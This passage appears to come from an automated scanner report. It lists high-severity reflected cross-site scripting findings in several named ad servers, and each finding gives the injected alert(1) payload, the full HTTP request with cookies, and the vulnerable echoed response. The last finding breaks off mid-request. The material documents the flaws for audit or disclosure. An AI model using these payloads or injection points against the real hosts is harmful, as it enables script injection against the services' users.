Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=970430S55820100219174939&flash=1081d17"%3balert(1)//822354244e3&time=5|16:53|-6&redir=http://r.turn.com/r/tpclick/id/Dcf-pNQcUXRfWQEAAwABAA/3c/http%3A%2F%2Fads.bluelithium.com%2Fclk%3F2%2C13%253B043d855be1402976%253B12c66594973%2C0%253B%253B%253B920605795%2CWaUDAFA-GABCjmgAAAAAALtAGwAAAAAAAgAQAAIAAAAAAP8AAAAGEeAEHgAAAAAAfYobAAAAAAC6KiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAwAAAAAAc0lZZiwBAAAAAAAAADBiZGE4ZWE4LWY0MzAtMTFkZi04MzdmLTAwMzA0OGQ2ZDRlMAAzmSoAAAA%3D%2Chttp%253A%252F%252Fglobal.ard.yahoo.com%252FSIG%253D15nqs9bgb%252FM%253D715481.14443201.14290363.1442997%252FD%253Dnews%252FS%253D81121452%253ALREC%252FY%253DYAHOO%252FEXP%253D1290214484%252FL%253D.GjhbELEatn9SQS9TNcPQw3ornoX2kznADQABWTl%252FB%253DSX7pAUJe5jA-%252FJ%253D1290207284380677%252FK%253Ddr57bEdaAWb2yHeTVQGMlw%252FA%253D5758430%252FR%253D0%252F%252A%2524%2Chttp%253A%252F%252Fnews.yahoo.com%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf-8%2C/url/$CTURL$&pos=x&dom=http://ad.yieldmanager.com&r=0.8183337452065122 HTTP/1.1
Accept: */*
Referer: http://ad.turn.com/server/ads.htm?&pub=11565610&code=11605355&cch=11605353&l=300x250&nonjs=1&sli=1804925&bli=2370234&exPub=24277&city=Houston&acp=1.3541&rnd=1290207316&3c=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F2%2C13%253B043d855be1402976%253B12c66594973%2C0%253B%253B%253B920605795%2CWaUDAFA%2DGABCjmgAAAAAALtAGwAAAAAAAgAQAAIAAAAAAP8AAAAGEeAEHgAAAAAAfYobAAAAAAC6KiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAwAAAAAAc0lZZiwBAAAAAAAAADBiZGE4ZWE4LWY0MzAtMTFkZi04MzdmLTAwMzA0OGQ2ZDRlMAAzmSoAAAA%3D%2Chttp%253A%252F%252Fglobal%2Eard%2Eyahoo%2Ecom%252FSIG%253D15nqs9bgb%252FM%253D715481%2E14443201%2E14290363%2E1442997%252FD%253Dnews%252FS%253D81121452%253ALREC%252FY%253DYAHOO%252FEXP%253D1290214484%252FL%253D%2EGjhbELEatn9SQS9TNcPQw3ornoX2kznADQABWTl%252FB%253DSX7pAUJe5jA%2D%252FJ%253D1290207284380677%252FK%253Ddr57bEdaAWb2yHeTVQGMlw%252FA%253D5758430%252FR%253D0%252F%252A%2524%2Chttp%253A%252F%252Fnews%2Eyahoo%2Ecom%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf%2D8%2C&url=http%3A%2F%2Fnews%2Eyahoo%2Ecom%2Fnews%2Fcommon%2Fpages%2Fgeneric%2Fdarla%2Fmd%3Fen%3Dutf%2D8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ads.pointroll.com
Proxy-Connection: Keep-Alive
Cookie: PRbu=ElHxOK9GG; PRgo=BBBAAsJqA; PRID=92CD9DBA-F620-4880-9A0A-F6FAE4305B05; PRimp=6F950400-28BF-90A4-0208-BDB000010100; PRca=|AJT3*130:1|AJhI*130:1|AImf*871:1|#; PRcp=|AJT3AACG:1|AJhIAACG:1|AImfAAOD:1|#; PRpl=|E3a5:1|EnBx:1|EG4d:1|#; PRcr=|FjnM:1|FujA:1|F6FH:1|#; PRpc=|E3a5FjnM:1|EnBxFujA:1|EG4dF6FH:1|#; PRvt=CBI42ElW7VLw5wAA6BAe

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 19 Nov 2010 22:56:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr970430' src='http://ads.pointroll.com/PortalServe/?pid=970430S55820100219174939&cid=1403573&pos=h&redir=http://r.turn.com/r/tpclick/id/Dcf-pNQcUXRfWQEAAwABAA/3c/http:/
...[SNIP]...
4,http%253A%252F%252Fnews.yahoo.com%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf-8,/url/$CTURL$&dom=http://ad.yieldmanager.com&time=5|16:53|-6&r=0.8183337452065122&flash=1081d17";alert(1)//822354244e3&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.68. http://ads.pointroll.com/PortalServe/ [r parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a84d"%3balert(1)//df37bfae83c was submitted in the r parameter. This input was echoed as 8a84d";alert(1)//df37bfae83c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=970430S55820100219174939&flash=10&time=5|16:53|-6&redir=http://r.turn.com/r/tpclick/id/Dcf-pNQcUXRfWQEAAwABAA/3c/http%3A%2F%2Fads.bluelithium.com%2Fclk%3F2%2C13%253B043d855be1402976%253B12c66594973%2C0%253B%253B%253B920605795%2CWaUDAFA-GABCjmgAAAAAALtAGwAAAAAAAgAQAAIAAAAAAP8AAAAGEeAEHgAAAAAAfYobAAAAAAC6KiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAwAAAAAAc0lZZiwBAAAAAAAAADBiZGE4ZWE4LWY0MzAtMTFkZi04MzdmLTAwMzA0OGQ2ZDRlMAAzmSoAAAA%3D%2Chttp%253A%252F%252Fglobal.ard.yahoo.com%252FSIG%253D15nqs9bgb%252FM%253D715481.14443201.14290363.1442997%252FD%253Dnews%252FS%253D81121452%253ALREC%252FY%253DYAHOO%252FEXP%253D1290214484%252FL%253D.GjhbELEatn9SQS9TNcPQw3ornoX2kznADQABWTl%252FB%253DSX7pAUJe5jA-%252FJ%253D1290207284380677%252FK%253Ddr57bEdaAWb2yHeTVQGMlw%252FA%253D5758430%252FR%253D0%252F%252A%2524%2Chttp%253A%252F%252Fnews.yahoo.com%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf-8%2C/url/$CTURL$&pos=x&dom=http://ad.yieldmanager.com&r=0.81833374520651228a84d"%3balert(1)//df37bfae83c HTTP/1.1
Accept: */*
Referer: http://ad.turn.com/server/ads.htm?&pub=11565610&code=11605355&cch=11605353&l=300x250&nonjs=1&sli=1804925&bli=2370234&exPub=24277&city=Houston&acp=1.3541&rnd=1290207316&3c=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F2%2C13%253B043d855be1402976%253B12c66594973%2C0%253B%253B%253B920605795%2CWaUDAFA%2DGABCjmgAAAAAALtAGwAAAAAAAgAQAAIAAAAAAP8AAAAGEeAEHgAAAAAAfYobAAAAAAC6KiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAwAAAAAAc0lZZiwBAAAAAAAAADBiZGE4ZWE4LWY0MzAtMTFkZi04MzdmLTAwMzA0OGQ2ZDRlMAAzmSoAAAA%3D%2Chttp%253A%252F%252Fglobal%2Eard%2Eyahoo%2Ecom%252FSIG%253D15nqs9bgb%252FM%253D715481%2E14443201%2E14290363%2E1442997%252FD%253Dnews%252FS%253D81121452%253ALREC%252FY%253DYAHOO%252FEXP%253D1290214484%252FL%253D%2EGjhbELEatn9SQS9TNcPQw3ornoX2kznADQABWTl%252FB%253DSX7pAUJe5jA%2D%252FJ%253D1290207284380677%252FK%253Ddr57bEdaAWb2yHeTVQGMlw%252FA%253D5758430%252FR%253D0%252F%252A%2524%2Chttp%253A%252F%252Fnews%2Eyahoo%2Ecom%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf%2D8%2C&url=http%3A%2F%2Fnews%2Eyahoo%2Ecom%2Fnews%2Fcommon%2Fpages%2Fgeneric%2Fdarla%2Fmd%3Fen%3Dutf%2D8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ads.pointroll.com
Proxy-Connection: Keep-Alive
Cookie: PRbu=ElHxOK9GG; PRgo=BBBAAsJqA; PRID=92CD9DBA-F620-4880-9A0A-F6FAE4305B05; PRimp=6F950400-28BF-90A4-0208-BDB000010100; PRca=|AJT3*130:1|AJhI*130:1|AImf*871:1|#; PRcp=|AJT3AACG:1|AJhIAACG:1|AImfAAOD:1|#; PRpl=|E3a5:1|EnBx:1|EG4d:1|#; PRcr=|FjnM:1|FujA:1|F6FH:1|#; PRpc=|E3a5FjnM:1|EnBxFujA:1|EG4dF6FH:1|#; PRvt=CBI42ElW7VLw5wAA6BAe

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 19 Nov 2010 22:56:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr970430' src='http://ads.pointroll.com/PortalServe/?pid=970430S55820100219174939&cid=1403573&pos=h&redir=http://r.turn.com/r/tpclick/id/Dcf-pNQcUXRfWQEAAwABAA/3c/http:/
...[SNIP]...
%252A%2524,http%253A%252F%252Fnews.yahoo.com%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf-8,/url/$CTURL$&dom=http://ad.yieldmanager.com&time=5|16:53|-6&r=0.81833374520651228a84d";alert(1)//df37bfae83c&flash=10&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.69. http://ads.pointroll.com/PortalServe/ [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30e5d"-alert(1)-"997de5d3b84 was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=970430S55820100219174939&flash=10&time=5|16:53|-6&redir=http://r.turn.com/r/tpclick/id/Dcf-pNQcUXRfWQEAAwABAA/3c/http%3A%2F%2Fads.bluelithium.com%2Fclk%3F2%2C13%253B043d855be1402976%253B12c66594973%2C0%253B%253B%253B920605795%2CWaUDAFA-GABCjmgAAAAAALtAGwAAAAAAAgAQAAIAAAAAAP8AAAAGEeAEHgAAAAAAfYobAAAAAAC6KiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAwAAAAAAc0lZZiwBAAAAAAAAADBiZGE4ZWE4LWY0MzAtMTFkZi04MzdmLTAwMzA0OGQ2ZDRlMAAzmSoAAAA%3D%2Chttp%253A%252F%252Fglobal.ard.yahoo.com%252FSIG%253D15nqs9bgb%252FM%253D715481.14443201.14290363.1442997%252FD%253Dnews%252FS%253D81121452%253ALREC%252FY%253DYAHOO%252FEXP%253D1290214484%252FL%253D.GjhbELEatn9SQS9TNcPQw3ornoX2kznADQABWTl%252FB%253DSX7pAUJe5jA-%252FJ%253D1290207284380677%252FK%253Ddr57bEdaAWb2yHeTVQGMlw%252FA%253D5758430%252FR%253D0%252F%252A%2524%2Chttp%253A%252F%252Fnews.yahoo.com%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf-8%2C/url/$CTURL$30e5d"-alert(1)-"997de5d3b84&pos=x&dom=http://ad.yieldmanager.com&r=0.8183337452065122 HTTP/1.1
Accept: */*
Referer: http://ad.turn.com/server/ads.htm?&pub=11565610&code=11605355&cch=11605353&l=300x250&nonjs=1&sli=1804925&bli=2370234&exPub=24277&city=Houston&acp=1.3541&rnd=1290207316&3c=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F2%2C13%253B043d855be1402976%253B12c66594973%2C0%253B%253B%253B920605795%2CWaUDAFA%2DGABCjmgAAAAAALtAGwAAAAAAAgAQAAIAAAAAAP8AAAAGEeAEHgAAAAAAfYobAAAAAAC6KiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAwAAAAAAc0lZZiwBAAAAAAAAADBiZGE4ZWE4LWY0MzAtMTFkZi04MzdmLTAwMzA0OGQ2ZDRlMAAzmSoAAAA%3D%2Chttp%253A%252F%252Fglobal%2Eard%2Eyahoo%2Ecom%252FSIG%253D15nqs9bgb%252FM%253D715481%2E14443201%2E14290363%2E1442997%252FD%253Dnews%252FS%253D81121452%253ALREC%252FY%253DYAHOO%252FEXP%253D1290214484%252FL%253D%2EGjhbELEatn9SQS9TNcPQw3ornoX2kznADQABWTl%252FB%253DSX7pAUJe5jA%2D%252FJ%253D1290207284380677%252FK%253Ddr57bEdaAWb2yHeTVQGMlw%252FA%253D5758430%252FR%253D0%252F%252A%2524%2Chttp%253A%252F%252Fnews%2Eyahoo%2Ecom%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf%2D8%2C&url=http%3A%2F%2Fnews%2Eyahoo%2Ecom%2Fnews%2Fcommon%2Fpages%2Fgeneric%2Fdarla%2Fmd%3Fen%3Dutf%2D8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ads.pointroll.com
Proxy-Connection: Keep-Alive
Cookie: PRbu=ElHxOK9GG; PRgo=BBBAAsJqA; PRID=92CD9DBA-F620-4880-9A0A-F6FAE4305B05; PRimp=6F950400-28BF-90A4-0208-BDB000010100; PRca=|AJT3*130:1|AJhI*130:1|AImf*871:1|#; PRcp=|AJT3AACG:1|AJhIAACG:1|AImfAAOD:1|#; PRpl=|E3a5:1|EnBx:1|EG4d:1|#; PRcr=|FjnM:1|FujA:1|F6FH:1|#; PRpc=|E3a5FjnM:1|EnBxFujA:1|EG4dF6FH:1|#; PRvt=CBI42ElW7VLw5wAA6BAe

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 19 Nov 2010 22:56:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr970430' src='http://ads.pointroll.com/PortalServe/?pid=970430S55820100219174939&cid=1403573&pos=h&redir=http://r.turn.com/r/tpclick/id/Dcf-pNQcUXRfWQEAAwABAA/3c/http:/
...[SNIP]...
%252FK%253Ddr57bEdaAWb2yHeTVQGMlw%252FA%253D5758430%252FR%253D0%252F%252A%2524,http%253A%252F%252Fnews.yahoo.com%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf-8,/url/$CTURL$30e5d"-alert(1)-"997de5d3b84&dom=http://ad.yieldmanager.com&time=5|16:53|-6&r=0.8183337452065122&flash=10&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.70. http://ads.pointroll.com/PortalServe/ [time parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dca09"%3balert(1)//ea2b3e7c2b5 was submitted in the time parameter. This input was echoed as dca09";alert(1)//ea2b3e7c2b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=970430S55820100219174939&flash=10&time=5|16:53|-6dca09"%3balert(1)//ea2b3e7c2b5&redir=http://r.turn.com/r/tpclick/id/Dcf-pNQcUXRfWQEAAwABAA/3c/http%3A%2F%2Fads.bluelithium.com%2Fclk%3F2%2C13%253B043d855be1402976%253B12c66594973%2C0%253B%253B%253B920605795%2CWaUDAFA-GABCjmgAAAAAALtAGwAAAAAAAgAQAAIAAAAAAP8AAAAGEeAEHgAAAAAAfYobAAAAAAC6KiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAwAAAAAAc0lZZiwBAAAAAAAAADBiZGE4ZWE4LWY0MzAtMTFkZi04MzdmLTAwMzA0OGQ2ZDRlMAAzmSoAAAA%3D%2Chttp%253A%252F%252Fglobal.ard.yahoo.com%252FSIG%253D15nqs9bgb%252FM%253D715481.14443201.14290363.1442997%252FD%253Dnews%252FS%253D81121452%253ALREC%252FY%253DYAHOO%252FEXP%253D1290214484%252FL%253D.GjhbELEatn9SQS9TNcPQw3ornoX2kznADQABWTl%252FB%253DSX7pAUJe5jA-%252FJ%253D1290207284380677%252FK%253Ddr57bEdaAWb2yHeTVQGMlw%252FA%253D5758430%252FR%253D0%252F%252A%2524%2Chttp%253A%252F%252Fnews.yahoo.com%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf-8%2C/url/$CTURL$&pos=x&dom=http://ad.yieldmanager.com&r=0.8183337452065122 HTTP/1.1
Accept: */*
Referer: http://ad.turn.com/server/ads.htm?&pub=11565610&code=11605355&cch=11605353&l=300x250&nonjs=1&sli=1804925&bli=2370234&exPub=24277&city=Houston&acp=1.3541&rnd=1290207316&3c=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F2%2C13%253B043d855be1402976%253B12c66594973%2C0%253B%253B%253B920605795%2CWaUDAFA%2DGABCjmgAAAAAALtAGwAAAAAAAgAQAAIAAAAAAP8AAAAGEeAEHgAAAAAAfYobAAAAAAC6KiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAwAAAAAAc0lZZiwBAAAAAAAAADBiZGE4ZWE4LWY0MzAtMTFkZi04MzdmLTAwMzA0OGQ2ZDRlMAAzmSoAAAA%3D%2Chttp%253A%252F%252Fglobal%2Eard%2Eyahoo%2Ecom%252FSIG%253D15nqs9bgb%252FM%253D715481%2E14443201%2E14290363%2E1442997%252FD%253Dnews%252FS%253D81121452%253ALREC%252FY%253DYAHOO%252FEXP%253D1290214484%252FL%253D%2EGjhbELEatn9SQS9TNcPQw3ornoX2kznADQABWTl%252FB%253DSX7pAUJe5jA%2D%252FJ%253D1290207284380677%252FK%253Ddr57bEdaAWb2yHeTVQGMlw%252FA%253D5758430%252FR%253D0%252F%252A%2524%2Chttp%253A%252F%252Fnews%2Eyahoo%2Ecom%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf%2D8%2C&url=http%3A%2F%2Fnews%2Eyahoo%2Ecom%2Fnews%2Fcommon%2Fpages%2Fgeneric%2Fdarla%2Fmd%3Fen%3Dutf%2D8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ads.pointroll.com
Proxy-Connection: Keep-Alive
Cookie: PRbu=ElHxOK9GG; PRgo=BBBAAsJqA; PRID=92CD9DBA-F620-4880-9A0A-F6FAE4305B05; PRimp=6F950400-28BF-90A4-0208-BDB000010100; PRca=|AJT3*130:1|AJhI*130:1|AImf*871:1|#; PRcp=|AJT3AACG:1|AJhIAACG:1|AImfAAOD:1|#; PRpl=|E3a5:1|EnBx:1|EG4d:1|#; PRcr=|FjnM:1|FujA:1|F6FH:1|#; PRpc=|E3a5FjnM:1|EnBxFujA:1|EG4dF6FH:1|#; PRvt=CBI42ElW7VLw5wAA6BAe

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 19 Nov 2010 22:56:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr970430' src='http://ads.pointroll.com/PortalServe/?pid=970430S55820100219174939&cid=1403573&pos=h&redir=http://r.turn.com/r/tpclick/id/Dcf-pNQcUXRfWQEAAwABAA/3c/http:/
...[SNIP]...
8430%252FR%253D0%252F%252A%2524,http%253A%252F%252Fnews.yahoo.com%252Fnews%252Fcommon%252Fpages%252Fgeneric%252Fdarla%252Fmd%253Fen%253Dutf-8,/url/$CTURL$&dom=http://ad.yieldmanager.com&time=5|16:53|-6dca09";alert(1)//ea2b3e7c2b5&r=0.8183337452065122&flash=10&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.71. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload f2113<script>alert(1)</script>2feb4be8354 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1507068&pid=1778767f2113<script>alert(1)</script>2feb4be8354&ps=-1&zw=445&zh=200&url=http%3A//www.politicsdaily.com/&v=5&dct=Politics%20News%2C%20Elections%20Coverage%2C%20Political%20Analysis%20and%20Opinion&ref=http%3A//www.aolnews.com/search/%3Fquery%3D%2560 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.politicsdaily.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ads.tw.adsonar.com
Proxy-Connection: Keep-Alive
Cookie: TID=16e8oqe01cg8de; TData=99999%7C50085%7C54057%7C60490%7C50212%7C50220%7C60183%7C50216%7C50229

Response

HTTP/1.1 200 OK
Date: Fri, 19 Nov 2010 23:43:28 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2512


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "1778767f2113<script>alert(1)</script>2feb4be8354"

   
                                                           </head>
...[SNIP]...

2.72. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 2b1df--><script>alert(1)</script>a59020951c9 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=15056882b1df--><script>alert(1)</script>a59020951c9&pid=994775&ps=-1&zw=640&zh=185&url=http%3A//www.aolnews.com/&v=5&dct=Top%20News%20%26%20Analysis%2C%20US%2C%20World%2C%20Sports%2C%20Celebrity%20%26%20Weird%20News HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.aolnews.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ads.tw.adsonar.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: TID=16e8oqe01cg8de; TData=99999%7C50085%7C54057%7C60490%7C50212%7C50220%7C60183

Response

HTTP/1.1 200 OK
Date: Fri, 19 Nov 2010 23:42:42 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3236


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "15056882b1df--><script>alert(1)</script>a59020951c9" -->
...[SNIP]...

2.73. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 6ec50--><script>alert(1)</script>d05b86eb3d6 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1507068&pid=1778767&ps=-16ec50--><script>alert(1)</script>d05b86eb3d6&zw=445&zh=200&url=http%3A//www.politicsdaily.com/&v=5&dct=Politics%20News%2C%20Elections%20Coverage%2C%20Political%20Analysis%20and%20Opinion&ref=http%3A//www.aolnews.com/search/%3Fquery%3D%2560 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.politicsdaily.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ads.tw.adsonar.com
Proxy-Connection: Keep-Alive
Cookie: TID=16e8oqe01cg8de; TData=99999%7C50085%7C54057%7C60490%7C50212%7C50220%7C60183%7C50216%7C50229

Response

HTTP/1.1 200 OK
Date: Fri, 19 Nov 2010 23:43:32 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3724


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-16ec50--><script>alert(1)</script>d05b86eb3d6" -->
   
...[SNIP]...

2.74. http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1288708%7C0%7C16%7CADTECH [AdId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn%7C3.0%7C5235%7C1288708%7C0%7C16%7CADTECH

Issue detail

The value of the AdId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 117f6'-alert(1)-'11281d989c was submitted in the AdId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C5235%7C1288708%7C0%7C16%7CADTECH;AdId=913421;BnId=-1;;loc=100;target=_blank;misc=[TIMESTAMP];rdclick=117f6'-alert(1)-'11281d989c HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
